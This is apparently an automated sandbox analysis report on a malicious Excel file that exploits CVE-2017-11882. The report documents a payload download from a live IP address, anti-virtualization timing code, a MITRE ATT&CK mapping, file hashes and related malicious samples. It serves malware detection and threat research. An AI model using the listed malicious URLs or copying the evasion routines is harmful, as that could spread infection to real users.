    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000329831 second address: 0000000000329831 instructions: 0x00000000 rdtsc 0x00000002 mov eax, FCDACE93h 0x00000007 sub eax, 1A63DDA3h 0x0000000c xor eax, D5EBB4F5h 0x00000011 add eax, C862BBFCh 0x00000016 cpuid 0x00000018 jmp 00007F22F08EB422h 0x0000001a pushad 0x0000001b mov dx, C148h 0x0000001f cmp dx, C148h 0x00000024 jne 00007F22F08EA77Dh 0x0000002a popad 0x0000002b popad 0x0000002c call 00007F22F08EB3E8h 0x00000031 lfence 0x00000034 mov edx, CD724B6Dh 0x00000039 xor edx, AC8852AFh 0x0000003f xor edx, A3550569h 0x00000045 xor edx, BD511CBFh 0x0000004b mov edx, dword ptr [edx] 0x0000004d lfence 0x00000050 test edx, eax 0x00000052 cmp eax, edx 0x00000054 test eax, ecx 0x00000056 ret 0x00000057 sub edx, esi 0x00000059 ret 0x0000005a add edi, edx 0x0000005c dec dword ptr [ebp+000000F8h] 0x00000062 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000069 jne 00007F22F08EB3C9h 0x0000006b test dl, FFFFFFE1h 0x0000006e call 00007F22F08EB42Bh 0x00000073 call 00007F22F08EB45Ch 0x00000078 lfence 0x0000007b mov edx, CD724B6Dh 0x00000080 xor edx, AC8852AFh 0x00000086 xor edx, A3550569h 0x0000008c xor edx, BD511CBFh 0x00000092 mov edx, dword ptr [edx] 0x00000094 lfence 0x00000097 test edx, eax 0x00000099 cmp eax, edx 0x0000009b test eax, ecx 0x0000009d ret 0x0000009e mov esi, edx 0x000000a0 pushad 0x000000a1 rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2832Thread sleep time: -300000s >= -30000s
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00329829 rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00329829 rdtsc
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00328C25 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032441B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00326503 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A24C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003292EB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A2D7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003237A0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmpBinary or memory string: Program Manager<

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Inquiry Sheet.xlsx27%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\Public\vbc.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe18%ReversingLabsWin32.Trojan.Mucc
    C:\Users\Public\vbc.exe18%ReversingLabsWin32.Trojan.Mucc

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://212.192.246.25/excel/vbc.exe100%Avira URL Cloudmalware
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://37.0.11.217/WEALTHYREM_ecI0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://212.192.246.25/excel/vbc.exetrue
    • Avira URL Cloud: malware
    unknown
    http://37.0.11.217/WEALTHYREM_ecItrue
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmpfalse
      high
      http://www.windows.com/pctv.vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpfalse
        high
        http://investor.msn.comvbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtvbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpfalse
            high
            http://www.icra.org/vocabulary/.vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oevbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpfalse
              high
              http://www.day.com/dam/1.0BEC4B86A.emf.0.drfalse
                high
                http://investor.msn.com/vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  212.192.246.25
                  unknownRussian Federation
                  205220RHC-HOSTINGGBtrue

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:482488
                  Start date:13.09.2021
                  Start time:20:15:41
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 23s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Inquiry Sheet.xlsx
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:2
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winXLSX@4/27@0/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 31.4% (good quality ratio 22.3%)
                  • Quality average: 46.5%
                  • Quality standard deviation: 35.9%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe
                  • TCP Packets have been reduced to 100
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/482488/sample/Inquiry Sheet.xlsx

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  20:16:41API Interceptor34x Sleep call for process: EQNEDT32.EXE modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  RHC-HOSTINGGB01_extracted.exeGet hashmaliciousBrowse
                  • 212.192.246.191
                  CHECKLIST INQ 1119.vbsGet hashmaliciousBrowse
                  • 212.192.246.191
                  DOCU_SIGN8289292930001028839.PDF.exeGet hashmaliciousBrowse
                  • 212.192.246.165
                  DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
                  • 212.192.246.165
                  DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
                  • 212.192.246.165
                  DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
                  • 212.192.246.165
                  DOCU_SIGN8289292930001028838.PDF.exeGet hashmaliciousBrowse
                  • 212.192.246.165
                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                  • 212.192.246.176
                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                  • 212.192.246.176
                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                  • 212.192.246.176
                  53t6VeSUO5.exeGet hashmaliciousBrowse
                  • 212.192.246.56
                  1p34FDbhjW.exeGet hashmaliciousBrowse
                  • 212.192.246.176
                  eli.exeGet hashmaliciousBrowse
                  • 212.192.246.242
                  eli.exeGet hashmaliciousBrowse
                  • 212.192.246.242
                  rfq-aug-09451.exeGet hashmaliciousBrowse
                  • 212.192.246.250
                  Nd1eFNdNeE.exeGet hashmaliciousBrowse
                  • 212.192.246.73
                  J5U0QK6IhH.exeGet hashmaliciousBrowse
                  • 212.192.246.147
                  RF 2001466081776.docGet hashmaliciousBrowse
                  • 212.192.246.147
                  HalkbankEkstre1608219773667200308882717534.ex.exeGet hashmaliciousBrowse
                  • 212.192.246.93
                  Inquiry.exeGet hashmaliciousBrowse
                  • 212.192.246.179

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:downloaded
                  Size (bytes):139264
                  Entropy (8bit):6.609176626733107
                  Encrypted:false
                  SSDEEP:1536:T8hQbCg3d/xOfo6dUoEiL7yQMLIn6Otq/CrAvI7S6mStD2arf6FRo6DomgJ:DGAZ6dNEc/MLo6Ot57S69D2aD6F5oj
                  MD5:B7E5ACDADE5630DBF1AB4B211DDC16DB
                  SHA1:EF39B9D9B31F61A538C79D06171B2F3FB62D3346
                  SHA-256:F16CD8C15E34505A4C72C77DF972264F67E97C2E0B79B205F82BB59F26C09998
                  SHA-512:61FA3478A69E18BF8024E656AB3C7334B96C94BA8A64E672596D77FE84F5E247508E13331DBE10D20488EDAEA7E0D976D8E5C1B27820AB4091F063E7833E05B9
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 18%
                  Reputation:low
                  IE Cache URL:http://212.192.246.25/excel/vbc.exe
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....kH..........................................@..........................`......\b..........................................(.... ..:;..................................................................8... ....................................text............................... ..`.data...XE..........................@....rsrc...:;... ...@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13D19963.emf
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):7788
                  Entropy (8bit):5.5366022587072345
                  Encrypted:false
                  SSDEEP:96:w0CblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wZTNAK4oOIGbK1RvVwPAWmOHX
                  MD5:F1E1ADDCD68163BF90F6BB1F51FBFEDF
                  SHA1:CDACDEC4E8E0EC2B60CB37585D156859AB6E6BD6
                  SHA-256:9BB4C7D9F2BECCEBD243C456185A0EE660A10248B91BDE9BAB8D8E9C5F7E66A6
                  SHA-512:CA37D803639C2DA62E113A6984E0A157094E51710A0302931F71A4A4B3DAFC1FB8786CCB86F2F0B7A156E1032BE49D7D5FCDE3B3CAD5A670A37376DB9A361AE1
                  Malicious:false
                  Reputation:low
                  Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................#.6.).X.......d.............................p....\...............\.....p........<5.u..p....`.p..#.$y.w.h&................w..&.$.......d............^.p.....^.p.\&..h&.H4......-...D....<.w................<.9u.Z.v....X.n......#........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C86035F.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):49744
                  Entropy (8bit):7.99056926749243
                  Encrypted:true
                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C6D05D4.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):6815
                  Entropy (8bit):7.871668067811304
                  Encrypted:false
                  SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                  MD5:E2267BEF7933F02C009EAEFC464EB83D
                  SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                  SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                  SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3469E5BD.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):33795
                  Entropy (8bit):7.909466841535462
                  Encrypted:false
                  SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                  MD5:613C306C3CC7C3367595D71BEECD5DE4
                  SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                  SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                  SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39CC72E1.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                  Category:dropped
                  Size (bytes):8815
                  Entropy (8bit):7.944898651451431
                  Encrypted:false
                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                  MD5:F06432656347B7042C803FE58F4043E1
                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A88E756.jpeg
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                  Category:dropped
                  Size (bytes):14198
                  Entropy (8bit):7.916688725116637
                  Encrypted:false
                  SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                  MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                  SHA1:72CA86D260330FC32246D28349C07933E427065D
                  SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                  SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                  Malicious:false
                  Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\438FC3C5.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):33795
                  Entropy (8bit):7.909466841535462
                  Encrypted:false
                  SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                  MD5:613C306C3CC7C3367595D71BEECD5DE4
                  SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                  SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                  SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                  Malicious:false
